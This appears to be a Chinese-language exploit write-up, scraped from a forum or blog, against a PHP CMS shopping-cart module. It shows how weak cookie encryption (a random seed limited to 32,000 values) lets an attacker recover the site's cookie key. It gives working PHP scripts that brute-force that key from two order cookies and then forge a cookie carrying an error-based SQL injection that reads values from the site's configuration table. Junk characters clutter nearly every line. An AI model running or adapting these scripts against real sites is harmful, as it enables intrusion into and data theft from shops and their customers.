www.xxx.com/plus/search.php?keyword=! H1 {( W3 P4 U& c3 G x" r
在 include/shopcar.class.php中. a2 F2 u6 I9 l* z f
先看一下这个shopcar类是如何生成cookie的
# N- ]$ X1 r' ] [239 function saveCookie($key,$value)0 o# ~) s9 J9 i0 E
240 {6 Q% y" }* k- R. s! ^7 Y. `/ H' _7 |
241 if(is_array($value)). f: t) P3 l9 ~5 T, J! L ^
242 {. [ T* R8 d1 P; R
243 $value = $this->enCrypt($this->enCode($value));8 n- \8 B( O( H& M1 v$ D% v
244 }2 J8 B' h6 d: Q, |9 t( y
245 else
# Z5 V: _& g4 B" j246 {
# n& l6 D/ F) N247 $value = $this->enCrypt($value);# z4 }3 L+ c$ m' Y! Z
248 }$ g6 ^2 l2 V9 {* @! C: M( M& i
249 setcookie($key,$value,time()+36000,’/');
. i2 T9 j: L# i3 K) Z# J& p N250 }. h4 S; |" M: `0 x8 S6 Q
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
2 W4 W" C' v: }2 L) [* P+ S186 function enCrypt($txt) j. {: l9 `6 h# R
187 {+ J8 h' ~7 }. t5 K
188 srand((double)microtime() * 1000000);6 f6 y7 \$ h% f3 U( R
189 $encrypt_key = md5(rand(0, 32000));7 i( U8 e* l7 u: O/ a8 V2 r
190 $ctr = 0;' K: a7 {' E4 q: f
191 $tmp = ”;
9 }6 t* y! ]- r8 `; e z4 _: _192 for($i = 0; $i < strlen($txt); $i++)2 C! f( Z) f( _5 `
193 {
/ P! [; U% c% z7 S+ `194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) s4 O4 _ D2 f9 `: ~6 O
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 R5 c6 Z1 R+ x; E; Q196 }
& K/ X5 w& d1 I- I- _- M \( c3 B" Q4 h197 return base64_encode($this->setKey($tmp));# N- _ \+ V+ n2 x+ K
198 }5 o& X3 J- W1 e K* J( C
213 function setKey($txt)
" o/ d3 M. C) w214 {& _" k6 b+ S4 V! {* t0 E
215 global $cfg_cookie_encode;
5 {$ Q8 C% n& G% z0 {' W216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
2 o, _" F1 E+ v1 e4 E217 $ctr = 0;
2 U7 f3 b H2 u2 r/ i218 $tmp = ”;
' U; ~: ?/ @2 b& a: S219 for($i = 0; $i < strlen($txt); $i++)
" v4 J' g% y3 Z3 H! J6 ?) y220 {
9 S3 ?, X0 r `5 x: J4 U221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
1 `8 d( f! y2 g" Z222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" D! n# U1 B% Z
223 }
, l; A! [+ V, h224 return $tmp;
7 b& J# S; |' {7 R H/ H( l8 D225 }9 D6 G( o/ x5 `2 i9 j
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的- j: b2 y2 [3 K, A5 t
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。' t4 [# c" X% j! p& o3 F2 w
具体代码如下:% ]# j$ s3 j* ~" X, `# F
<?php
$ ^& {7 S. j5 J! X( I$ |' r$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here' p3 |$ W# J: J2 \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
8 w+ }' Z' F! B4 v* w% ~$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
/ ]& ~+ `$ K7 V8 \6 u D6 B. U5 ~function reStrCode($code,$string)8 E" i! N1 m+ I K9 O: H- Q$ N
{
6 l7 O- s# X5 {; o$code = base64_decode($code);' Q" d$ ?: m$ N" `8 A5 Q
$key = “”;; v% {: p/ e N
for($i=0 ; $i<32 ; $i++)
' t3 c: i9 u$ r! w{( U! T. m6 l0 d! m8 R: q) G% D$ V
$key .= $string[$i] ^ $code[$i];% p. {9 k6 ~% C2 r) @
}2 l7 H3 S+ ` Q, V; ^! `
return $key;" f! {+ G: _# B4 `
}8 y. }2 L. ^8 ?" B( ?" `
function getKeys($cookie,$plantxt): g: Q' Q' y' \0 ^# O
{
" x) P1 ?7 q/ P" J( j- @- R$tmp = $cookie;
8 g# R( H2 C! E0 [9 D: W. |$results = array();; U2 C( b! a) k
for($j=0 ; $j < 32000; $j++)& z' h1 \2 U7 y! R( B q
{
) o2 {8 A& {/ e, Z O2 L9 F/ h4 [( q
$txt = $plantxt;
7 Z' J8 I3 P5 d1 Z4 t* ]1 f% ?$ctr = 0;/ w1 L! o5 C" a* k8 z' a" Z" P
$tmp = ”;
- |; u; o/ h. x6 l4 J" P, L( H$encrypt_key = md5($j);
* L4 m3 S* b6 s% [for($i =0; $i < strlen($txt); $i ++)" N8 ?- f! F% j* D( A6 @ \
{6 H5 ]+ ^& P# C/ l8 Z
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;+ A. Z* P7 G( q; k3 [7 {8 {. ?
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
# b3 G3 B6 D! Y) G7 \! f$ _}
+ [- Z# p" V* h9 C# w- t$string = $tmp;
6 W( T- f1 J5 ~* d/ R$code = $cookie;8 d0 l1 h% {- k/ ]
$result = reStrCode($code,$string);% L4 b2 w) P0 k) p' L) o( a
if(eregi(‘^[a-z0-9]+$’,$result))
; B3 Y% a9 s# c4 y8 x0 r, i+ q{' W: @! Y$ r0 [' r7 ^2 c
echo $result.”\n”;
6 L* g U# l N# c t$ w$results[] = $result;
4 r; E% r/ D: T}8 K( m# K$ I- C, S
}2 O2 S; `$ @7 d- b! z. n' L7 U- Y1 |
return $results;+ P& f, {6 o- w# ^* x
}
' y9 _* T4 U5 ?$results1 = getKeys($cookie1,$plantxt);9 J: F( E4 V# W" H
$results2 = getKeys($cookie2,$plantxt);
9 x6 M/ K. V, S1 Nprint “\n——————–real key————————–\n”;
4 ~- a0 ~7 \/ Uforeach($results1 as $test1)% C- a/ `- M9 J9 |; M2 B3 _
{
; ^- { W. S: t6 v; l& W- d uforeach($results2 as $test2)
' D) z6 K4 D# X) T; }+ `8 Y{. Q) o5 t8 V. X X, d
if($test1 == $test2)
3 B5 ?. O# N6 d0 y! g, A/ Q{; q0 x( K9 t! `( J; I# S
echo $test1.”\n”;
) L3 x2 Y+ \9 u' y}0 X7 C' F1 e/ c; ?9 @8 W
}
B1 g, c: o, B9 T4 M$ l" }}7 [& N) _% V% T) O! g
?>
$ d/ d& m% U* X* y4 S* y4 h3 \. W. qcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
; z" K7 p! c* B1 splantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
9 i* p: J2 U3 W$ n, T$ b7 y然后推算出md5(strtolower($cfg_cookie_encode))) h) i; `, b$ k. h l- U& `
得到这个key之后,我们就可以构造任意购物车的cookie# B' ~; _/ H9 f9 G
接着看 w" C3 {# U r1 k+ f p) D5 m! g
20 class MemberShops
/ x8 B) l5 n1 n: q$ b \7 }9 P+ Z21 {
; K6 \0 W! G' ]6 j22 var $OrdersId;
4 e5 M+ P2 ~, @, F7 d# h/ x% s, @8 F23 var $productsId;
- `! y w1 U" H9 h+ _24
+ C; x4 R7 ]4 ~; w6 O. N25 function __construct()# D; S5 ^1 W: D) G
26 {6 a* ~& ?$ {8 t' P
27 $this->OrdersId = $this->getCookie(“OrdersId”);
! g4 }0 H; K: X% ]6 P4 C28 if(empty($this->OrdersId))4 l$ @0 c( c! J7 M _
29 {2 V! I0 P: m' a9 q
30 $this->OrdersId = $this->MakeOrders();
0 P$ Z( X p. {6 i( @6 n31 }
. V. K- c! A: A. o8 s+ [32 }5 ^$ j' c2 B7 E$ O) ^) }1 t
发现OrderId是从cookie里面获取的. p8 g, g) j* A$ f
然后% ~" l2 t6 y$ s$ k6 y2 E
/plus/carbuyaction.php中的/ r6 K* M' q& t" P& W) [
29 $cart = new MemberShops();
- f$ c, u6 o4 R9 i& y4 V39 $OrdersId = $cart->OrdersId; //本次记录的订单号
; o/ O. Z: p( q# V2 V……
2 p! t* U7 ]& F: l173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
6 D, Y; f. }) O+ q, ]1 V( I接着我们就可以注入了5 {7 S/ n! T8 h- V! @8 X7 r$ m% R
通过利用下面代码生成cookie:1 ?+ K& p, H* ~2 S p; v7 A
<?php
! H4 ^0 P/ ]4 E* g$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
+ F. }! h& M' x+ n6 _; K$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
0 D2 f- A; x, p6 s) S& T7 Jfunction setKey($txt)
& U6 D2 X; ?# C1 _& u{
' U- k4 U3 G& @global $encrypt_key;* Q! E3 _3 z$ N z+ A: {! G* v& `
$ctr = 0;4 k; S _9 o% N& h, _
$tmp = ”;) j- E) }. ]5 {
for($i = 0; $i < strlen($txt); $i++)
- ?4 t q% g/ h4 h! A$ m{3 a7 i, r$ H! I: y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
2 ^$ C% A: E j, p( m& c$ R$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
7 Y+ K9 y! [, i. B3 c, z5 z}4 j: `. U% ]' T, s/ m! a
return $tmp;
" d* N; j2 Y* q2 N$ ?! u5 o* ?" v$ j}3 s# I/ U1 h. h8 R+ ~3 h
function enCrypt($txt), k* W- Y. k4 G% m
{7 ^7 v: B* B& E2 P2 c$ D4 O
srand((double)microtime() * 1000000);
% ~) w" |- X9 \8 U$encrypt_key = md5(rand(0, 32000));
% T+ q# _/ l$ T8 p$ctr = 0;
5 Y. _. U! [/ o. w0 G$tmp = ”;8 ?# |+ y! j0 L9 p% S% I9 L
for($i = 0; $i < strlen($txt); $i++)2 b3 a4 Z2 a: \. ]. o+ G& m0 N; N9 d
{9 c" X- i4 h# X5 f( u7 e0 A
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 ? Q# N8 k8 B/ G6 }
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
3 K% W5 F$ r* l: b' C# v( I% g} I% H4 h5 g5 C$ b
return base64_encode(setKey($tmp));
6 J& @; [6 l* |" D8 S6 F8 Q}1 c" T4 b' i! @/ N0 @: I/ ]
for($dest =0;$dest = enCrypt($txt);)& }; K* F4 Q, H9 K; u" O1 w( P
{
5 s) J: I. F: R4 r: v, {if(!strpos($dest,’+'))
! [$ y. v" c* x0 W: `9 T( o% E{
6 O5 F' y1 f Y. h0 l/ bbreak;
7 g& k% u( a- s" e}
' ?; k! I5 W3 m+ e}$ ?" M- [ ^- v8 Z
echo $dest.”\n”;1 K# ^# h3 v3 C( G
?>% n( l9 j- a& J: x; p8 H4 O, A) P
+ D1 N' l2 b" v, e! X6 _ |